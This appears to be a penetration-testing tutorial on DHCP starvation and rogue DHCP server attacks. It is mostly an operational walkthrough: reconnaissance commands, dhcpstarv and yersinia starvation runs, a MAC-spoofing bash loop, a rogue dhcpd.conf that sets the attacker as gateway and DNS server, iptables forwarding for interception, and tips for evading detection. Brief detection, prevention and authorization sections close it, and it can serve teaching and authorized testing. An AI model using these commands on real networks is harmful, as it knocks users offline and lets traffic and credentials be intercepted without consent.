DHCP Attacks

Understanding DHCP Attacks - IP Allocation Manipulation

What is DHCP Attacks?

Simple Definition: DHCP attacks either exhaust all available IP addresses so legitimate users can’t connect to the network, or provide fake network settings that redirect user traffic through the attacker’s system.

Technical Definition: DHCP attacks exploit the Dynamic Host Configuration Protocol through resource exhaustion (DHCP starvation) or service impersonation (rogue DHCP servers) to deny network access or redirect traffic for man-in-the-middle positioning.

Why DHCP Attacks Work

DHCP attacks succeed due to protocol design limitations:

  • No Authentication: DHCP servers don’t authenticate clients requesting IP addresses
  • First Response Wins: Clients accept the first DHCP response received
  • Finite IP Pool: Limited number of available IP addresses can be exhausted
  • Trust-Based Assignment: Clients trust all network configuration from DHCP responses

Attack Process Breakdown

DHCP Starvation Attack

  1. Pool Discovery: Identify DHCP server and available IP range
  2. Request Flooding: Send numerous DHCP requests with unique MAC addresses
  3. Address Exhaustion: Consume all available IP addresses in the pool
  4. Service Denial: Legitimate clients cannot obtain IP addresses
  5. Network Isolation: Devices lose connectivity or fail to connect

Rogue DHCP Server Attack

  1. Malicious Server Setup: Configure DHCP server with attacker-controlled settings
  2. DNS Redirection: Point clients to attacker-controlled DNS server
  3. Gateway Spoofing: Configure attacker as default gateway
  4. Response Racing: Respond faster than legitimate DHCP server
  5. Traffic Interception: All client traffic flows through attacker

Real-World Impact

Network Service Denial: Prevent new devices from connecting to the network

Traffic Redirection: Route all user traffic through attacker-controlled systems

DNS Manipulation: Redirect users to malicious websites or capture credentials

Corporate Network Compromise: Intercept business communications and sensitive data

WiFi Network Takeover: Control all wireless client network configuration

Technical Concepts

DHCP Protocol Fundamentals

DHCP Process (DORA):

  1. Discover: Client broadcasts DHCP discover request
  2. Offer: Server responds with IP address offer
  3. Request: Client requests the offered address
  4. Acknowledge: Server confirms assignment

DHCP Components:

  • IP Address Pool: Range of assignable addresses
  • Lease Duration: How long client can use address
  • Network Options: Gateway, DNS, domain name
  • Reservations: Static assignments based on MAC

DHCP Message Types

Key Messages:

  • DHCP Discover (Type 1): Client seeking IP address
  • DHCP Offer (Type 2): Server offering IP address
  • DHCP Request (Type 3): Client requesting specific IP
  • DHCP ACK (Type 5): Server confirming assignment
  • DHCP Release (Type 7): Client releasing IP address

Attack Vectors

Starvation Attack: Exhaust DHCP pool with fake requests Rogue Server: Provide malicious network configuration Option Manipulation: Inject malicious DHCP options Relay Attack: Manipulate DHCP relay agents

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network segment with DHCP services
  • Ability to send/receive broadcast traffic
  • Knowledge of network IP ranges

Essential Tools:

  • Dhcpstarv: DHCP starvation attack tool
  • Yersinia: Comprehensive Layer 2 attack framework
  • DHCPd: ISC DHCP server for rogue server attacks
  • Nmap: DHCP discovery and reconnaissance

Essential Command Sequence

Step 1: DHCP Reconnaissance 

# Discover DHCP servers on network
nmap --script dhcp-discover 192.168.1.0/24
# Identifies active DHCP servers
# Shows available IP ranges and lease information
# Reveals DNS servers and gateway configuration

# Monitor DHCP traffic
tcpdump -i eth0 -v port 67 or port 68
# Port 67: DHCP server port
# Port 68: DHCP client port
# Observes normal DHCP request/response patterns

# Test current DHCP allocation
dhclient -r eth0  # Release current lease
dhclient eth0     # Request new lease
# Verify DHCP service is active and responsive

Purpose: Identify DHCP infrastructure and understand network configuration before launching attacks.

Step 2: DHCP Pool Assessment 

# Estimate DHCP pool size
nmap --script dhcp-discover --script-args dhcp-discover.requests=10
# Multiple requests reveal pool size and allocation patterns
# Helps determine effort required for starvation

# Monitor lease assignments
tail -f /var/lib/dhcp/dhcpd.leases  # If access to DHCP server
# Shows current lease database
# Identifies active vs available addresses

Purpose: Understand DHCP server capacity and current utilization for effective attack planning.

Step 3: Execute DHCP Starvation

Using Dhcpstarv:

# Basic DHCP starvation attack
dhcpstarv -i eth0
# -i eth0: Network interface for attack
# Generates DHCP requests with random MAC addresses
# Continues until stopped or pool exhausted

# Monitor attack progress
tcpdump -i eth0 port 67 or port 68 | grep -c "DHCP-Message"
# Count DHCP messages to gauge attack intensity
# Watch for NACK responses indicating pool exhaustion

Using Yersinia:

# Launch Yersinia interactive mode
yersinia -I
# Select: DHCP protocol
# Choose: "sending discover packet" attack
# Configurable MAC address generation

# Command-line DHCP exhaustion
yersinia dhcp -attack 1
# Attack 1: DHCP starvation
# Automatically generates requests with unique MACs

Custom Starvation Script:

# Systematic DHCP pool exhaustion
#!/bin/bash
for i in {1..254}; do
    # Generate unique MAC address
    MAC="02:$(printf "%02x" $i):$(openssl rand -hex 4 | sed 's/../&:/g;s/:$//')"
    
    # Request IP with unique MAC
    dhclient -r eth0 2>/dev/null
    ifconfig eth0 hw ether $MAC
    timeout 5 dhclient eth0
    
    echo "Attempted MAC: $MAC"
done

Step 4: Deploy Rogue DHCP Server

Install and Configure DHCPd:

# Install DHCP server software
apt update && apt install isc-dhcp-server

# Create malicious DHCP configuration
cat > /etc/dhcp/dhcpd.conf << EOF
default-lease-time 600;
max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.150 192.168.1.200;
    option routers 192.168.1.10;              # Attacker as gateway
    option domain-name-servers 192.168.1.10;  # Attacker DNS
    option domain-name "malicious.local";
    option broadcast-address 192.168.1.255;
}
EOF
# Configure attacker IP as gateway and DNS server
# Clients will route all traffic through attacker

# Start rogue DHCP server
systemctl start isc-dhcp-server
systemctl status isc-dhcp-server

Configure Traffic Interception:

# Enable IP forwarding for gateway role
echo 1 > /proc/sys/net/ipv4/ip_forward

# Set up NAT for internet access
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Configure DNS interception
echo "nameserver 8.8.8.8" > /etc/resolv.conf
systemctl start bind9  # If running local DNS

Step 5: Verify Attack Success 

# Monitor DHCP lease assignments
tail -f /var/lib/dhcp/dhcpd.leases
# Shows clients receiving malicious configuration
# Confirms rogue server is responding to clients

# Test client redirection
# From victim machine:
nslookup google.com
# Should resolve through attacker DNS

# Verify traffic interception
tcpdump -i eth0 -nn 'port 80 or port 443'
# Should see client HTTP/HTTPS traffic
# Confirms successful traffic redirection

Purpose: Confirm clients are receiving malicious DHCP configuration and traffic is being intercepted.

Attack Variations

Selective DHCP Attacks 

# Target specific device types by MAC OUI
yersinia dhcp -attack 1 -mac-prefix "00:50:56"  # VMware
yersinia dhcp -attack 1 -mac-prefix "08:00:27"  # VirtualBox
# Targets virtual machines specifically
# Useful in mixed physical/virtual environments

Option 82 Relay Attacks 

# Manipulate DHCP relay information
# Requires understanding of network topology
# Can bypass some DHCP security measures

# Monitor for relay agent information
tcpdump -i eth0 -x 'port 67' | grep -A5 -B5 "Option 82"

DNS Cache Poisoning via DHCP 

# Provide malicious DNS servers in DHCP responses
# Redirect specific domains to attacker servers
# More targeted than complete traffic interception

# Configure selective DNS redirection
cat >> /etc/dhcp/dhcpd.conf << EOF
option domain-name-servers 192.168.1.10, 8.8.8.8;
EOF
# Attacker DNS first, legitimate backup

Common Issues and Solutions

Problem: DHCP starvation not affecting legitimate clients

  • Solution: Check for DHCP reservations, increase attack intensity, target correct network segment

Problem: Rogue DHCP responses ignored by clients

  • Solution: Ensure faster response than legitimate server, check network positioning

Problem: Clients lose all connectivity with rogue server

  • Solution: Verify IP forwarding enabled, configure proper NAT rules

Problem: Attack detected and blocked

  • Solution: Use legitimate-looking MAC addresses, reduce request frequency, vary timing

Advanced Techniques

DHCP Fingerprinting Evasion 

# Mimic legitimate client DHCP fingerprints
# Modify DHCP options to match common devices
# Avoid detection by DHCP fingerprinting systems

# Example: Mimic Windows client
dhclient -cf /dev/stdin eth0 << EOF
option dhcp-parameter-request-list 1,15,3,6,44,46,47,31,33,121,249,43;
EOF

Combining DHCP with Other Attacks 

# DHCP + ARP spoofing for enhanced control
# Step 1: Poison DHCP to become gateway
# Step 2: ARP spoof for granular traffic control

# DHCP + DNS spoofing
# Control both IP assignment and name resolution

Detection and Prevention

Detection Indicators

  • Unusual number of DHCP requests from single host
  • DHCP requests with sequential or suspicious MAC addresses
  • Multiple DHCP servers responding on network
  • Clients receiving unexpected network configuration
  • Rapid DHCP pool exhaustion

Prevention Measures

DHCP Snooping:

  • Creates database of legitimate DHCP assignments
  • Blocks unauthorized DHCP servers
  • Validates DHCP messages against database

Port Security:

  • Limit number of MAC addresses per switch port
  • Prevents MAC address spoofing for starvation
  • Automatically disables ports with violations

DHCP Authentication:

  • Implement secure DHCP with authentication
  • Use DHCP relay authentication
  • Deploy certificate-based validation

Network Design:

  • Segregate DHCP servers on protected VLANs
  • Use dedicated DHCP relay agents
  • Implement network access control (NAC)

Professional Context

Legitimate Use Cases

  • Security Testing: Validating DHCP security configurations
  • Network Resilience: Testing DHCP failover and recovery
  • Penetration Testing: Demonstrating network access control weaknesses
  • Infrastructure Assessment: Identifying DHCP service dependencies

Legal and Ethical Requirements

Authorization: DHCP attacks can cause widespread network outages - explicit written permission essential

Service Impact: Document potential for disrupting critical network services

Recovery Procedures: Ensure ability to restore normal DHCP operation quickly

Scope Limitations: Define which network segments are acceptable for DHCP testing

DHCP attacks demonstrate the importance of securing fundamental network services, as compromise can provide widespread network access and traffic interception capabilities.